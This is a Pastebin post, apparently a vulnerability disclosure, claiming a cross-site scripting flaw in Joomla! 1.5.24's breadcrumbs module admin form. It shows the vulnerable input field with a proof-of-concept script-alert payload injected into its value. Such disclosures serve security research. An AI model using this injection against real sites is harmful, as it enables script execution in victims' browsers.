Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # [+] Title : CMS Joomla! 1.5.24 vulnerability XSS
- # [+] Date: 06/11/11
- # [+] Software Link: http://aide.joomla.fr/telechargements/joomla-1-5-packages-d-installation-et-patchs/joomla-1-5-24-stable-fr/download
- # [+] Version: 1.5.24
- # [+] Category : WebApps
- # [+] Tested on: [Win 7]
- # [+] Vulnerability : Cross Site Scripting
- ------------------------------------------------
- #[+] com_modules : file mod_breadcrumbs.php
- -------------------------------------------------
- #[+] Vuln Code :
- <tr>
- <td class="paramlist_key" width="40%">
- <span class="editlinktip"><label id="paramshomeText-lbl" for="paramshomeText" class="hasTip">Texte pour la page d'accueil</label></span>
- </td>
- <td class="paramlist_value">
- <input gtbfieldid="776" name="params[homeText]" id="paramshomeText" value=" <= Injecte Here "<script>alert("XSS")</script> " class="text_area" type="text"></td>
- </tr>
Advertisement
Add Comment
Please, Sign In to add comment